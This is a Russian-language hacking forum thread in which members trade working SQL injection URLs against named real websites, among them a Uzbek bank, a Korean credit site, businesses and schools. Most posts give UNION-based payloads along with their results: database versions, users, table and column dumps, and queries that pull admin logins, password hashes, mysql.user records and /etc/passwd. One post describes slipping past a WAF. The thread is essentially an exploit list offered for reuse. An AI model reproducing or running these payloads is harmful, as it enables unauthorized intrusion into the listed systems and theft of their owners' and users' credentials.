SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    http://www.ctclchina.com/news.php?aid=-45+union+select+1,2,3,concat_ws(0x3a,user,0x3a,password,0x3a,file_priv),5,6,7,8,9+from+mysql.user
    MySQL 5.0.51a-3ubuntu5.1
    http://www.ctclchina.com/news.php?aid=-45+union+select+1,2,3,load_file(0x2F6574632F706173737764),5,6,7,8,9 - чтение файлов на сервере (/etc/passwd)
     
    2 people like this.
  2. fox_malder

    fox_malder Active Member

    Joined:
    28 Nov 2008
    Messages:
    164
    Likes Received:
    131
    Reputations:
    73
    http://chobags.us/products.php?id=-72+and+0+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8+--+&type=products
    4.1.22-max-log
    4bag4new
    4bag4new@208.109.181.10
    unknown-linux-gnu
     
  3. GrAmOzEkA

    GrAmOzEkA Elder - Старейшина

    Joined:
    25 Jun 2006
    Messages:
    240
    Likes Received:
    76
    Reputations:
    29
    http://www.coyc.ru/sauce.php?sid=-6+union+select+1,2,3,database()--
    http://www.coyc.ru/sauce.php?sid=-1+UNION+SELECT+1,2,3,group_concat(table_name)+FROM+information_schema.tables+WHERE+table_schema=0x7537363638395F636F7963--
    http://www.coyc.ru/sauce.php?sid=-1+UNION+SELECT+1,2,3,group_concat(column_name)+FROM+information_schema.columns+WHERE+table_schema=0x7537363638395F636F7963+AND+table_name=0x6163636F756E7473--
    http://www.coyc.ru/sauce.php?sid=-1+UNION+SELECT+1,2,3,group_concat(column_name)+FROM+information_schema.columns+WHERE+table_schema=0x7537363638395F636F7963+AND+table_name=0x7573657273--
     
    #11243 GrAmOzEkA, 6 Dec 2009
    Last edited by a moderator: 6 Dec 2009
    1 person likes this.
  4. Heavy Metal

    Heavy Metal Member

    Joined:
    16 Sep 2007
    Messages:
    21
    Likes Received:
    27
    Reputations:
    7
    sweb, постом

    Code:
    http://www.tests-tests.com/bio.php?question=0234232653314114344433&qcur=4&qnum=-1 union select version()/*
     
  5. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    301
    Likes Received:
    89
    Reputations:
    27
    http://www.tayloralden.com/news.php?id=-13+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables--

    http://www.almaz-antey.ru/news.php?id=-13+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12+from+information_schema.tables--
     
    #11245 Bramin, 7 Dec 2009
    Last edited: 7 Dec 2009
  6. fox_malder

    fox_malder Active Member

    Joined:
    28 Nov 2008
    Messages:
    164
    Likes Received:
    131
    Reputations:
    73
    http://docksr.us/en/nieuws.php?id=56+and+0+union+select+1,2,id,login,password,6,7,8+from+users+--+
     
    1 person likes this.
  7. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    241
    Likes Received:
    161
    Reputations:
    108
    bpbux.info

    Code:
    http://bpbux.info/forum/main_forum.php?cat=-1+Union+ALL+Select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7--
    Code:
    5.0.32-Debian_7etch5~bpo31+1-log:jbarros_gen5@supremecenter103.com:jbarros_gen5
    woobux.com

    Code:
    http://www.woobux.com/forum/main_forum.php?cat=-1+Union+ALL+Select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7--
    Code:
    5.0.85-community:woobuxco_ptc@localhost:woobuxco_ptc
     
    2 people like this.
  8. Pr0mo

    Pr0mo Member

    Joined:
    26 Nov 2009
    Messages:
    29
    Likes Received:
    31
    Reputations:
    4
    -1-
    target : http://www.stanadyne.com
    Exploit: http://www.stanadyne.com/view.php?id=111+AND+1=2+UNION+SELECT+0,1,2,null,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
    Database : stacms
    User : stacms@97.74.24.95
    Version : 5.0.67.d7-ourdelta-log
    Contain :

    [0]SSI_Customers: CustomerID,CustomerName,Abbriv
    [1]SSI_GroupParts: ID,Group,PartNo,Quantity,X,Y,OnLine,IndentFlag,Color
    [2]SSI_GroupTypes: ID,Description
    [3]SSI_Groups: ID,GroupID,PartNo,Quantity,X,Y,Indent,Note,GroupType
    [4]SSI_MasterPart: ID,PartNo,Description,Superceded
    [5]SSI_Model: ID,Model,StanadynePN,CustomerID,CustomerPN,Engine,Application,Edition,ECN,Dated,Reman
    [6]SSI_Model1: Model,StanadynePN,CustomerID,CustomerPN,Engine,Application,Edition,ECN,Dated,Reman
    [7]SSI_ModelAssemblys: ID,Model,Assembly
    [8]SSI_ModelEditions: ID,Model,Edition,ECN,EditionDate
    [9]SSI_ModelGroups: ID,Model,Group,Page,Position,GroupType
    [10]SSI_Parts: PartNo,Description,Notes,Superseded,SA,PartNoDesc,AssemblyNo
    [11]SSI_Parts1: PartNo,Description,Notes,Superseded
    [12]SSI_RawServLit: ID,Type,Literature,Revision,SUBJECT,CUSTOMER,Model
    [13]SSI_RawSubject: SUBJECT,RELATED,RELATED,RELATED
    [14]SSI_RawXref: Model,Service,Parts,Service
    [15]SSI_ServiceAssemblys: Assembly,Description
    [16]SSI_SupersededParts: RecordID,PartNo,SupersededBy
    .......
    Example:
    http://www.stanadyne.com/view.php?id=111+AND+1=2+UNION+SELECT+0,1,2,CustomerName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+SSI_Customers--


    -2-
    target : http://www.thedinah.com
    Exploit: http://www.thedinah.com/votes/vote.php?id=7+AND+1=2+UNION+SELECT+0,null,2,3,4--
    Database : thedi36_thedinah
    User : thedi36_mariahus@localhost
    Version : 5.0.81-community
    Contain :

    [0]td_adcontainer: ncontainerid,sname,sgroup,ssubgroup
    [1]td_admin: slogin,spwd,ssmtpserver,ssmtpuserid,ssmtppwd,sfromemailid,bapprovecomments,simagebordercolor,simageborderwidth,svideobgcolor,bhidepreviewinbrowsemedia,sbackgroundcolor,sbackgroundimage,busebackgroundimage
    [2]td_ads: nadid,simageurl,slinkurl,nmaximpressions,ncurrimpressions,dcreatedon,nclicks,nwidth,nheight,nadcontainer,salternatetext,sscript
    [3]td_album: nalbumid,sname,dcreated
    [4]td_article: narticleid,nsectionid,dcreated,dmodified,dpublished,ncreatedby,nmodifiedby,stitle,ssummary,sbody,ballowcomments,bapproveforpub,ballowrss,nweight,nviews,barchive,skeywords,nthumbnail,nheadingthumbnail
    [5]td_articleads: nlinkid,narticleid,nadid,nposition
    [6]td_articlemedia: nlinkid,narticleid,nmediaid,nposition
    [7]td_comment: ncommentid,narticleid,nuserid,dpostedon,sbody,sname,bapproved,napprovedby
    [8]td_editors: neditorid,spwd,ddate,sname,bdisabled,simagefile,baddtolist,suserid,bownarticles,botherarticles,bownpublish,botherpublish,bownedit,botheredit,bownmedia,bothermedia,badmanager,bcategories,bowncomments,bothercomments,bhomepage,semail,bsignups,sinfo,bphotoalbum,nsort
    [9]td_homepage: nthumbheight,nthumbwidth,nthumbwhatsupheight,nthumbwhatsupwidth,nrecentnewsitems,nwhatsuparticle,nlatestmembers,nlatestblogs,nlatestvlogs,smainbtn1text,smainbtn2text,smainbtn3text,smainbtn4text,smainbtn5text,smainbtn1link,smainbtn2link,smainbtn3link,smainbtn5link,smainbtn4link,nrecentnewscat,swhatsuptitle,srecentnewstitle,srecentblogstitle,sleftbargraphic,nhomepagearticle
    [10]td_media: nmediaid,ntype,sfilename,scaption,skeywords,nwidth,nheight,dcreatedon,naddedby,sthumbnail
    [11]td_menu: nentryid,nsequence,nlevel,stext,surl,nparentid,nchild
    [12]td_pgroup: ngroupid,nalbumid,dcreated,sname
    [13]td_photo: nphotoid,scaption,dcreated,sby,ngroupid,sfilename
    [14]td_poll: npollid,bactive,squestion,soption1,soption2,soption3,soption4,soption5,nvotes1,nvotes2,nvotes3,nvotes4,nvotes5
    [15]td_section: nsectionid,nparentsection,sname,sdescription
    [16]td_subscribe: nid,semailid,ddate,bremove
    [17]td_user: nuserid,susername,suserpwd,sfullname,semail,dsignup,sactivationkey,spwdrecoverykey,bdisabled,simagefile,slocation,scity,scountry
    [18]td_vote: nvoteid,stitle,smatter,dcreated,nclosed
    [19]td_votev: nlinkid,nvoteid,nmediaid,nvotes,nposition
    [20]td_voting: nvoteid,nmemberid,dvote,nmediaid
    Example:
    http://www.thedinah.com/votes/vote.php?id=7+AND+1=2+UNION+SELECT+0,concat(slogin,0x3a,spwd),2,3,4+from+td_admin--



    -3-
    target : http://eco.creditbank.co.kr/
    Exploit: http://eco.creditbank.co.kr/dir.php?id=44+AND+1=2+UNION+SELECT+0,1,2,3,null,5,6,7,8,9,10--
    Databases :
    • eco
    • mysql
    • test (empty)
    User : eco@203.234.219.196
    Version : 5.0.51b
    Contain (eco) :

    [0]zase_bbs_incruit_article: no,site_no,site_name,title,content,url,written,checksum_no,indexed,regdate
    [1]zase_bbs_incruit_checksum: no,prefix,suffix
    [2]zase_bbs_notice_article: no,site_no,site_name,title,content,url,written,checksum_no,indexed,regdate
    [3]zase_bbs_notice_checksum: no,prefix,suffix
    [4]zase_company_basic: no,bookcode_code1,bookcode_upchecd,bookcode_upjo_key,bookcode_upjo_name,bookcode_upname,bookcode_eng_name,sang1_homepage,sang1_addr_kor,sang1_tel,sang1_intro,sang2_estab_date,sang2_list_date,sang2_old_upche,sang2_employee_low,sang2_rptv_kor,sang3_juju_name1,sang3_juju_name2,sang3_juju_name3,sang3_sale_name1,sang3_sale_name2,sang3_sale_name3,sang3_curr_sale1,sang3_curr_sale2,sang3_curr_sale3,sang3_profit_name1,sang3_profit_name2,sang3_profit_name3,sang3_profit_name4,sang3_curr_profit1,sang3_curr_profit2,sang3_curr_profit3,sang3_curr_profit4,sang3_export_ratio,sang2_inspect_corp,sang25_normal_st,sang25_first_st,sang25_foreign,sang1_face_value,sang2_fs_month,sang1_market_seg,regdate
    [5]zase_company_eva_new: stockcd,year1,year2,year3,year4,noplat1,noplat2,noplat3,noplat4,ic1,ic2,ic3,ic4,roic1,roic2,roic3,roic4,wacc1,wacc2,wacc3,wacc4,eva1,eva2,eva3,eva4
    [6]zase_company_sang04: stockcd,s0,s1,s2,s3,s4,s5_0,s5,s6,s7,s8,s9_0,s9,s10,s11,s12,s13_0,s13,s14,s15,s16,s49_0,s49,s50,s51,s52,s17_0,s17,s18,s19,s20,s29_0,s29,s30,s31,s32,s33_0,s33,s34,s35,s36,s57_0,s57,s58,s59,s60,s61_0,s61,s62,s63,s64,s45_0,s45,s46,s47,s48,s53_0,s53,s54,s55,s56
    [7]zase_company_sang05: stockcd,bs1,bs2,bs3,bs4,bs5,bs6,bs7,bs8,bs9,bs10,bs11,bs12,bs13,bs14,bs15,bs16,bs17,bs18,bs19,bs20,bs21,bs22,bs23,bs24,bs25,bs26,bs27,bs28,bs29,bs30,bs31,bs32,bs33,bs34,bs35,bs36,bs37,bs38,bs39,bs40,bs41,bs42,bs43,bs44,bs45,bs46,bs47,bs48,bs49,bs50,bs51,bs52,bs53,bs54,bs55
    [8]zase_company_sang06: stockcd,pl1,pl2,pl3,pl4,pl5,pl6,pl7,pl8,pl9,pl10,pl11,pl12,pl13,pl14,pl15,pl16,pl17,pl18,pl19,pl20,pl21,pl22,pl23,pl24,pl25,pl26,pl27,pl28,pl29,pl30,pl31,pl32,pl33,pl34,pl35,pl36,pl37,pl38,pl39,pl40,pl41,pl42,pl43,pl44,pl45,pl46,pl47,pl48,pl49,pl50,pl51,pl52,pl53,pl54,pl55,pl56,pl57,pl58,pl59,pl60,pl61,pl62,pl63,pl64,pl65,pl66,pl67,pl68,pl69,pl70,pl71,pl72,pl73,pl74,pl75,pl76,pl77,pl78,pl79,pl80
    [9]zase_company_sang07: stockcd,rt1,rt2,rt3,rt4,rt5,rt6,rt7,rt8,rt9,rt10,rt11,rt12,rt13,rt14,rt15,rt16,rt17,rt18,rt19,rt20,rt21,rt22,rt23,rt24,rt25,rt26,rt27,rt28,rt29,rt30,rt31,rt32,rt33,rt34,rt35,rt36
    [10]zase_company_sang28: stockcd,sale_incre1,sale_incre2,roe1,roe2,rt1,rt2,eps1,eps2
    [11]zase_company_sang37_beta: stockcd,date1,date2,beta11,beta12,beta13,vola11,vola12,vola13,beta21,beta22,beta23,vola21,vola22,vola23
    [12]zase_company_sang401: stockcd,title,wongo10,wongo20,wongo30
    [13]zase_company_sang402: stockcd,title,wongo1,wongo2,wongo3
    [14]zase_company_temp: no,bookcode_code1,bookcode_upname,sang1_homepage,onoff,regdate
    [15]zase_company_tmp_basic: no,bookcode_code1,bookcode_upchecd,bookcode_upjo_key,bookcode_upjo_name,bookcode_upname,bookcode_eng_name,sang1_homepage,sang1_addr_kor,sang1_tel,sang1_intro,sang2_estab_date,sang2_list_date,sang2_old_upche,sang2_employee_low,sang2_rptv_kor,sang3_juju_name1,sang3_juju_name2,sang3_juju_name3,sang3_sale_name1,sang3_sale_name2,sang3_sale_name3,sang3_curr_sale1,sang3_curr_sale2,sang3_curr_sale3,sang3_profit_name1,sang3_profit_name2,sang3_profit_name3,sang3_profit_name4,sang3_curr_profit1,sang3_curr_profit2,sang3_curr_profit3,sang3_curr_profit4,sang3_export_ratio,sang2_inspect_corp,sang25_normal_st,sang25_first_st,sang25_foreign,sang1_face_value,sang2_fs_month,sang1_market_seg,regdate
    [16]zase_company_tmp_eva_new: stockcd,year1,year2,year3,year4,noplat1,noplat2,noplat3,noplat4,ic1,ic2,ic3,ic4,roic1,roic2,roic3,roic4,wacc1,wacc2,wacc3,wacc4,eva1,eva2,eva3,eva4
    [17]zase_company_tmp_sang04: stockcd,s0,s1,s2,s3,s4,s5_0,s5,s6,s7,s8,s9_0,s9,s10,s11,s12,s13_0,s13,s14,s15,s16,s49_0,s49,s50,s51,s52,s17_0,s17,s18,s19,s20,s29_0,s29,s30,s31,s32,s33_0,s33,s34,s35,s36,s57_0,s57,s58,s59,s60,s61_0,s61,s62,s63,s64,s45_0,s45,s46,s47,s48,s53_0,s53,s54,s55,s56
    [18]zase_company_tmp_sang05: stockcd,bs1,bs2,bs3,bs4,bs5,bs6,bs7,bs8,bs9,bs10,bs11,bs12,bs13,bs14,bs15,bs16,bs17,bs18,bs19,bs20,bs21,bs22,bs23,bs24,bs25

    Contain (mysql) :
    [0]columns_priv: Host,Db,User,Table_name,Column_name,Timestamp,Column_priv
    [1]db: Host,Db,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
    [2]func: name,ret,dl,type
    [3]help_category: help_category_id,name,parent_category_id,url
    [4]help_keyword: help_keyword_id,name
    [5]help_relation: help_topic_id,help_keyword_id
    [6]help_topic: help_topic_id,name,help_category_id,description,example,url
    [7]db: Host,Db,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
    [8]func: name,ret,dl,type
    [9]help_category: help_category_id,name,parent_category_id,url
    [10]help_keyword: help_keyword_id,name
    [11]help_relation: help_topic_id,help_keyword_id
    [12]help_topic: help_topic_id,name,help_category_id,description,example,url
    [13]host: Host,Db,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv
    Example:
    http://www.hemasolutions.com/query.php?id=13+AND+1=2+UNION+SELECT+0,concat(users_name,0x3a,users_pass),2,3,4,5,6,7,8,9+from+hemasol_hema.users--
     
    8 people like this.
  9. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    edu
    (phpBB) bbf_users::id,username,user_password
    Administrator
    логинилка в форумах
    MySQL 5.1.39-log
     
    3 people like this.
  10. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    версия БД:4.0.13:
    БД:user_medtech2:
    пользователь:medtech2@localhost

    версия:4.1.18-log
    пользователь:pilot@localhost
    БД:pilot
    ОС:portbld-freebsd6.1

    версия:5.0.87-community-log
    БД:slidesho_slideshow
    пользователь:slidesho@localhost
    ОС:unknown-linux-gnu
    gallery@slideshow

    ------------------------------>
    версия:5.0.22
    БД:urka200022_steel
    пользователь:son3@localhost
    ОС:redhat-linux-gnu


    DB:
    Code:
    information_schema@test_del@urka200022_stee
    tables:
    Code:
    aallcontr@aallservices@aanekdots@aboard@acontract@adish@adistr@aevents@afiles@ajob@akitchen@amenukindname@anews@article@aservices@astatistuser@atypuser@auserdishtype@ausers@avisitors@avoting@board@board2@category@communication@du_client@du_filedl@du_forumb@du_forumt@du_news@du_passw@du_sendpost@du_usprog@favcatnews@favcatprod@favprod@files@login@news@newsgroup@product@searchplacelist@searchword@searchwplace@stoplist@tablelist@testtable@topic@users@webclient
    
    атрибуты webclient:
    Code:
    id@user_id@dt_zakaz@diam@sten@mar_st@zakazano@srok_post@otgruzh@vagon@dt_vagon@sklad_nik@sklad_st@dt_prokat@typ@is_close@dt_close
    
    атрибуты users:
    Code:
    d@login@passwd@name@first_name@typ@is_locked@e_mail@phone@fax@dt_created@dt_locked@sms@txt@handy@communication_id@country
    
    атрибуты ausers:
    Code:
    id@login@passwd@name@name_boss@name_man@typ_id@kitchen_id@timework@logo_id@adress@extadress@phone@e_mail@http@distr_id@map_id@descr@viewfoto@namefoto@sizefoto@foto_size_y@discount@is_locked
    
    атрибуты login:
    Code:
    d_login@login@password@status
    атрибуты du_passw:
    Code:
    id@iduser@identkod@sdate
    атрибуты du_client:
    Code:
    id@login@passw@email@lico@firma@licenz@prg_c@prg_v@prg_z

    PostgreSQL
    version:5.0.81-community-log
    user:eek:dessave_boltik@localhost


    версия:4.1.22-log
    БД:arsenalu
    пользователь:u_arsenalu@localhost
    ОС:pc-linux-gnu

    версия:4.1.22-log
    БД:lcci
    пользователь:lcci@localhost
    ОС:unknown-freebsd6.2
     
    _________________________
    #11250 Strilo4ka, 9 Dec 2009
    Last edited: 10 Dec 2009
    1 person likes this.
  11. Pr0mo

    Pr0mo Member

    Joined:
    26 Nov 2009
    Messages:
    29
    Likes Received:
    31
    Reputations:
    4
    -1-
    Target : http://www.freestyleagency.eu
    Exploit:http://www.freestyleagency.eu/model-mail.php?type=Video&id=97+AND+1=2+UNION+SELECT+0,null,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
    Database : freestyl_freestyle
    User : freestyl_agency@localhost
    Version : 5.0.85-community-log
    Contain :

    [0]admin: IdAdmin,UserAdmin,PassAdmin,EmailAdmin,StatusAdmin
    [1]models: model_id,first_name,last_name,height,bust_chest,cup_size,waist,hips,eye_color,hair_colour,hair_length,shoe_size,size,text,card_big,card_s1,card_s2,card_s3,card_s4,type_id,status,count,date_added,last_modified
    [2]news: news_id,title,content,status,date_added,last_modified
    [3]type: type_id,type
    Example:
    http://www.freestyleagency.eu/model-mail.php?type=Video&id=97+AND+1=2+UNION+SELECT+0,concat_ws(0x3a,UserAdmin,PassAdmin),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+admin--

    -2-
    Target : http://www.web0668.net
    Exploit:http://www.web0668.net/url.php?id=149+AND+1=2+UNION+SELECT+0,null,2--
    Database : sq_web0668
    User : sq_web0668@125.65.112.47
    Version : 5.0.45-community-nt-log
    Contain :

    [0]web_ad: ad_id,ad_size,ad_name,ad_time,ad_url,ad_img
    [1]web_admin: admin_id,admin_name,admin_password,admin_type
    [2]web_cate: cate_id,cate_name,cate_cate,cate_asc
    [3]web_file: file_id,file_about,file_cooperrtion,file_ad
    [4]web_hot: hot_id,hot_cate,hot_name,hot_url,hot_img,hot_bz,hot_views,hot_time
    [5]web_links: link_id,link_name,link_color,link_abc,link_url,link_img,link_views,link_cate,link_back,link_bz,link_time,link_type,link_disp
    [6]web_mess: ms_id,ms_title,ms_content,ms_user,ms_time,ms_backtime,ms_views,ms_type,ms_cate
    [7]web_ncate: ncate_id,ncate_name,ncate_cate,ncate_asc
    [8]web_new: new_id,new_name,new_url,new_views,new_time
    [9]web_pl: pl_id,pl_name,pl_content,pl_class,pl_time
    [10]web_rank: rank_id,rank_name,rank_url,rank_views,rank_time
    [11]web_sys: sys_id,sys_webname,sys_username,sys_tel,sys_fax,sys_qq,sys_email,sys_address,sys_copyright,sys_website,sys_icp
    [12]web_txtad: adtxt_id,adtxt_name,adtxt_time,adtxt_url
    Example:
    http://www.web0668.net/url.php?id=149+AND+1=2+UNION+SELECT+0,concat_ws(0x3a,admin_name,admin_password),2+from+web_admin--

    -3-
    Target : http://www.somethingyoushouldread.com
    Exploit:http://www.somethingyoushouldread.com/mail/mail.php?id=159+AND+1=2+UNION+SELECT+null,1--
    Database : benberkon
    User : benberkon@97.74.144.144
    Version : 4.1.22-max-log
    Contain :

    [0]admin: id,name,pass
    ...
    Example:
    http://www.somethingyoushouldread.com/mail/mail.php?id=159+and+1=2+union+select+concat_ws(0x3a,name,pass),1+from+admin--
    AdminPanel:
    http://somethingyoushouldread.com/upload/login/login.php
     
    4 people like this.
  12. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,505
    Likes Received:
    398
    Reputations:
    228
    Code:
    http://karendodsonmurals.com/girls.php?id=-51+union+select+1,2,table_name,4,5,6+from+information_schema.tables+--+&pic=0
    Code:
    http://www.honeyzescorts.co.uk/girls.php?id=6+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
    Code:
    http://www.sportsbikes.org/girls.php?Blonde%20babe%20in%20lingerie%20with%20suzuki&id=-8+union+select+1,2,3,concat_ws(0x3a3a,username,password,email),5,6,7,8,9+from+members+where+type=0x61646D696E+/*+
    Code:
    http://www.carbabewallpapers.com/view.php?id=-79+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+/*+
    Code:
    http://www.video-spezial.de/start-girls.php?id=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+user+--+
    Code:
    http://www.janinescort.com/girls.php?lang=en&id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*+
    Code:
    http://www.jessys-girls.ch/girls.php?cmd=show&id=-18+union+select+1,unhex(hex(table_name)),3+from+information_schema.tables+--+
     
    #11252 DezMond™, 10 Dec 2009
    Last edited: 10 Dec 2009
    3 people like this.
  13. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    99
    Likes Received:
    44
    Reputations:
    6
    Code:
    http://www.lunapack.com.ua/news.php?id=56+and+1=0+Union%20Select%20%201,2,3,version%28%29%20,5
    Version = 5.0.88-log
    Database = serkin_lunapack
    User = serkin_lunapack@first.hosted.in

    Code:
    http://miniaturebottles.com/MMBC_guestbook/view.php?id=511+and+1=0+Union%20Select%20%201,UNHEX%28HEX%28version%28%29%29%29%20,3,4,5,6,7
    Version = 4.1.25-log
    User = a0008864@69.12.112.22
    Database = a0008864-2
    Tables:password, contacts
    Columns: Table password:username ,id, userpass
     
    #11253 TELO, 12 Dec 2009
    Last edited: 12 Dec 2009
    3 people like this.
  14. GrAmOzEkA

    GrAmOzEkA Elder - Старейшина

    Joined:
    25 Jun 2006
    Messages:
    240
    Likes Received:
    76
    Reputations:
    29
    Галлабанк
    Code:
    http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,database%28%29,3,4,5,6,7,8,9,10--
    qqb

    Code:
    http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema=0x717162--
    branch 0x6272616E6368
    deposit 0x6465706F736974
    exchange
    m_transfer
    minibank 0x6D696E6962616E6B
    news
    presssa
    s_office 0x735F6F6666696365
    valuta

    Code:
    http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema=0x717162+AND+table_name=0x735F6F6666696365--
    id
    branch_id
    so_adres
    language
    date_rec

    Code:
    http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema=0x717162+AND+table_name=0x6272616E6368--
    id
    branch_mfo
    branch_name
    phone_num
    address
    language
    date_rec
    per_n
    tr
    Code:
    http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema=0x717162+AND+table_name=0x6D696E6962616E6B--
    id
    branch_id
    mb_name
    mb_adres
    language
    date_rec
    Code:
    http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema=0x717162+AND+table_name=0x6465706F736974--
    id
    type_currency
    name_deposit
    type_deposit
    period,percent
    first_deposit
    general_conditions
    activ
    language
    cur_date
    Code:
    http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-1+UNION+SELECT+1,group_concat(id,0x3A,type_currency,0x3A,name_deposit,0x3A,type_deposit,0x3A,period,0x3A,percent,0x3A,first_deposit,0x3A,general_conditions,0x3A,activ,0x3A,language,0x3A,cur_date,0x3A),3,4,5,6,7,8,9,10+FROM+qqb.deposit--
    Code:
    http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-1+UNION+SELECT+1,group_concat(user,0x3A,password),3,4,5,6,7,8,9,10++FROM+mysql.user--
     
    #11254 GrAmOzEkA, 12 Dec 2009
    Last edited by a moderator: 12 Dec 2009
    3 people like this.
  15. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    241
    Likes Received:
    161
    Reputations:
    108
    designerpreviews.com PR-3

    Данные передаем постом, ибо стоит злобный WAF

    Code:
    http://www.designerpreviews.com/index.php?sec=-4/**/union/**/select/**/1,2,3,4,5,6,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,8,9,10+--+
    Code:
    5.0.81-community:designer_briank@localhost:designer_db
    ottosshrunkenhead.com PR-4

    Также инъектим постом

    Code:
    http://www.ottosshrunkenhead.com/php/eventsdbm.php?event_id=-1+union+select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,2,3,4,5,6,7,8+--+&cmd=edit&type=1
    Code:
    5.0.81-community:ottosshr_otto@localhost:ottosshr_odb
    equinesavior.com PR-3

    POST

    Code:
    http://equinesavior.com/phpclassifieds/index.php?catid=7+UnIon+SeLeCt+1,2,3,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17+--+&catname=General%20Merchandise
    Code:
     5.0.81-community:equinesa_owner@localhost:equinesa_phpclass
     
    1 person likes this.
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273
    http://lancia.ro/noutati.php?id=-38+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9


    Database version: 5.0.85-community
    Database name: lancia2_content2
    Database user: lancia2_admcon@localhost
    Os: pc-linux-gnu
     
    5 people like this.
  17. fox_malder

    fox_malder Active Member

    Joined:
    28 Nov 2008
    Messages:
    164
    Likes Received:
    131
    Reputations:
    73
    http://www.monterra.ro/index.php?module=vanzare&tip=3&id=50+and+0+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57
    5.0.22
    monterra
    root@localhost
    redhat-linux-gnu

    http://www.monterra.ro/index.php?module=vanzare&tip=3&id=50+and+0+union+select+1,2,id,4,5,email,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+from+users
     
    1 person likes this.
  18. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    217
    Likes Received:
    105
    Reputations:
    50
    Code:
    http://www.aeria.ma/news.php?id=-1+union+select+1,concat_ws%28user%28%29,version%28%29,database%28%29,@@version_compile_os%29--
    
    user:aeria@209.62.86.68:
    version:5.0.84-percona-highperf-b18-log:
    database:aeria:
    OS:unknown-linux-gnu
    Code:
    http://www.businessexperts.ma/businessexperts/details-news.php?id=-8+union+select+1,2,3,concat_ws%280x3a,user%28%29,version%28%29,database%28%29,@@version_compile_os%29,5,6,7,8,9--
    user:ahmani@localhost:
    version:5.0.45:
    database:businessexperts:
    OS:redhat-linux-gnu.
    Code:
    http://www.alexnursing.edu.eg/news.php?id=-14+union+select+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29,@@version_compile_os%29,3,4,5--
    user:alexnurs_nw@localhost:
    version:5.0.85-community:
    database:alexnurs_ndb:
    OS:pc-linux-gnu
     
  19. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    User: pscsru_pscs@localhost
    Database: pscsru_pscs
    Version: 5.0.67-community
     
    4 people like this.
